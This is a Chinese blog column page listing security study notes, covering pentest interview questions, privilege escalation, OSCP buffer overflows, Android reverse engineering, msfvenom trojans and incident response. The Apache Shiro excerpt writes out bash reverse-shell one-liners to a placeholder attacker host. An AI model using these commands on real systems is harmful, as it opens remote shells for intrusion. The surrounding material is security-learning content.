
读书笔记
文章平均质量分 64
逝之君
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
web面试指南
介绍一下自认为有趣的挖洞经历(或CTF经历) 你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? 你平时使用哪些工具?以及对应工具的特点? 如果遇到waf的情况下如何进行sql注入/上传Webshell怎么做?请写出曾经绕过WAF的经过(SQLi,XSS,上传漏洞选一) 参考以下三篇 我的WafBypass之道(SQL注入篇) 我的WafBypass之道(Upload篇) 我的WafBypass之道(Misc篇) ..转载 2021-02-19 12:53:16 · 1260 阅读 · 1 评论 -
Ossec踩坑记录
1.搭建OSSEC参考教程https://www.cnblogs.com/zlslch/p/8512757.html2.踩坑记录笔者装的是目前最新的3.6.0版本,但是make不支持mysql,一直报错:make: *** 没有规则可以创建目标“setdb”。 停止。查阅文档发现从3.0.0版本开始,编译方式不一样。后来在github的iusse找到解决方案#before compiling, input "DATABASE=mysql" in you bash command lin原创 2020-08-07 19:26:26 · 956 阅读 · 0 评论 -
Apache shiro1.2.4 Getshell
方法一利用JRMPClient反弹shell方式Bash:bash -i >& /dev/tcp/attackIP/7777 0>&1/bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&10<&196;exec 196<>/dev/tcp/attackIP/7777; sh <&196 >&196 2>&196P转载 2020-06-16 19:29:02 · 807 阅读 · 0 评论 -
AWS认证攻略 – E哥的AWS Solution Architecture Associate 认证攻略
AWS认证介绍AWS Certified Solutions Architect 系列认证是亚马逊从2013年开始推出的对云计算架构师能力的官方认证。考试不仅考察应试者对AWS相关云服务的熟悉程度,题目也多来源于实际中要解决的问题,要求应试者有全面的架构设计经验和积累,所以含金量很高。在美国招聘网站glassdoor上,AWS solution architect的身价平均在10万美金以上,可见...转载 2020-04-08 15:07:43 · 10108 阅读 · 0 评论 -
Django用户登录与注册系统
https://blog.youkuaiyun.com/laikaikai/article/details/80563387转载 2020-03-26 17:46:40 · 368 阅读 · 0 评论 -
如何解决selenium与firefox版本不匹配的问题
在做wechat爬虫时遇到的问题,整理记录下:1.selenium与firefox版本不匹配:报错为 :selenium.common.exceptions.WebDriverException: Message: Can't load the profile. Profile Dir: /tmp/tmpazh15s If you specified a log_file in the...原创 2020-03-10 11:10:08 · 957 阅读 · 0 评论 -
Linux 提权的各种姿势总结
这篇讲一些关于 Linux 提权的方法,也是参考网上的一些提权方式,对于刚接触 Linux 提权的伙伴来说,需要花不少时间去理解,所以这里是以个人通俗易懂的思路去写,希望能帮到热爱学习的朋友,先写这些提权方法。若有更好的提权方式,欢迎老哥们在评论里补充一下。提权可能需要反弹 bash ,因为脚本语言无法形成管道,需要创造一个管道才能进行后续的操作,比如溢出成功之后返回一个 root 权限的 s...转载 2020-02-21 16:38:06 · 4734 阅读 · 0 评论 -
备战OSCP——缓冲区溢出实战(一)
如题所示,为了备战OSCP的缓冲区溢出,特开新篇。本系列所有的例子均可以在git上找到,链接为:https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice本次所用的是第一个例子,brainpan.exe.没记错的话应该是出自vulnbox。首先第一步,验证程序,使用od打开brainp...原创 2019-05-23 13:37:26 · 2767 阅读 · 0 评论 -
安卓安全——读书笔记
想到什么就随手写点吧,最近刚看完《Android软件安全与逆向分析》。另外还有一本《Android应用安全防护和逆向分析》,准备开始看。两本书的PDF链接我会放在末尾,需要的自取。《Android软件安全与逆向分析》书中提到了多种去除Android本地限制的方法,倾向于基础性的安卓破解,比如去内购(不过本书的内购都是围绕着google play来讲的,和国内的内购相差很大,国内的话更...原创 2019-05-01 14:49:10 · 749 阅读 · 0 评论 -
史上最强内网渗透知识点总结
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247487491&idx=1&sn=270336c6cca79b4a4e5d777d41ce71b7&chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...转载 2019-01-13 22:33:14 · 8997 阅读 · 0 评论 -
应急响应基础笔记
应急响应笔记基础知识Linux操作系统基础一些常见的命令必须熟悉:ls怎么按照时间排序列出当前目录文件? ls实现列文件按时间排序 1) ls -lt 时间最近的在前面 2) ls -ltr 时间从前到后stat命令是干嘛的? 显示文件详细信息,访问时间、内容修改时间、状态修改时间lsof的作用是什么?lsof每一列分别代表什么? ...原创 2018-04-26 17:24:49 · 1329 阅读 · 0 评论 -
渗透工具之msf
转载自csdn:忆蓉之心简介它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。环境工具:msf4伪装木马原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。转载 2017-08-17 09:47:14 · 38202 阅读 · 3 评论 -
入侵取证调查
webshell调查取证转载 2017-08-21 15:06:55 · 1040 阅读 · 0 评论 -
Web渗透测试求职问答大全
0x00前言 如果我们要面试一个渗透测试工程师,其中一些经典的问题是必要会被问到的,所以本文就这些方面进行一个比较基础的总结,希望这些总结会对大家面试有所帮助。更重要的是,本文将非常非常具体地分析每一个步骤、所需的工具、思路等等0x02 常见问答1 拿到一个待检测的站,你觉得应该先做什么?答:1IP域名类查询:http://www.aizhan.com/ http://转载 2017-08-21 15:54:20 · 920 阅读 · 0 评论 -
Win提权思路,方法,工具(小总结)
介绍windows提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西。最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西。希望本指南能为你的入门提供良好的基础知识。所以本指南主要集中在枚举方...转载 2018-02-26 11:31:01 · 2428 阅读 · 0 评论 -
从面试题中学Web安全
转载自90sec根据 Github 上的面经总结的一些安全岗面试的基础知识,这些基础知识不仅要牢记,而且要熟练操作,分享给大家,共勉。如果有漏掉的大家可以留言或是联系作者补充,谢谢。1.对Web安全的理解我觉得 Web 安全首先得懂 Web、第三方内容、Web 前端框架、Web 服务器语言、Web 开发框架、Web 应用、Web容器、存储、操作系统等这些都要了解,然后较为常见且危害较大的,SQL ...转载 2018-03-22 13:07:20 · 7826 阅读 · 0 评论 -
安卓逆向基础学习
才开始学习安卓逆向,从java到dex再到smali,一步一步认识,学习,了解看懂smali语法。首先目前网上的学习教程都是从游戏破解开始。游戏破解第一去内购。我们可以用android studio 的monitor来进行查看logcat,以此来定位敏感词然后用Android killer全局搜索敏感词,例如“支付失败,支付成功”等。然后找到相关函数,类似onsuccess/paysuccess等...原创 2018-03-06 12:00:25 · 2200 阅读 · 1 评论 -
随便写写,怕自己忘了(二)
这段时间遇到比较好玩的,大概提几点吧,怕自己忘了。上传文件,能任意上传,但是解释失败,报错编译失败?过滤找到规则,是检验文件头。这个时候,把图片马除文件头以外的内容全删除,有奇效。getshell这是一个大型系统的通杀。自己体会领悟吧对了,再提一点,有些时候报错,不是因为你马有问题,可能是你做昏头了,忘了是linux还是win,cmd=ls,win能不报错吗?再说个应急响应的。刚亲眼见证大佬20分...原创 2018-03-13 16:38:43 · 343 阅读 · 0 评论 -
互联网企业安全高级指南读书笔记(1)
前五章理论性质太强,故暂时快速跳过不进行记录,最后再总结性的重顾。此处直接从第六章开始。第六章 基础安全措施6.1安全域划分。统一安全等级主机统一划分,设置相同的网络边界,在边界执行最小权限开放对其他安全域的网络访问控制策略。传统安全域划分会分出DMZ和内网,通过硬件防火墙的不同端口实现隔离,但不适用于大规模生产网络,更多适用于办公网络。大型生产环境安全域划分则是把不同的业务(垂直纵向)以及分层的...原创 2018-04-09 21:20:16 · 515 阅读 · 0 评论 -
互联网企业安全高级指南读书笔记(2)
第一版读书笔记的内容太多,方式不行,严重影响看书效率,第二版 重新写。第七章网络安全网络入侵检测传统NIDS出口处部署,可以在1day披露的时候做虚拟补丁用NIDS可以为字眼NIDS争取时间。开源SNORT全流量NIDSIDC规模决定NIDS架构。D还是P对于门槛而言,发现远低于保护。厂商而言提供一个可以解决问题的平台,更重要的是能自定义规则,支持一种脚本语言,让甲方能够专注与自身核心业务安全。(...原创 2018-04-10 22:40:46 · 365 阅读 · 0 评论 -
关于espcms的sql注入漏洞代码审计复现
一个关于espcms注入漏洞的代码审计过程复现原创 2017-05-25 11:01:54 · 4519 阅读 · 14 评论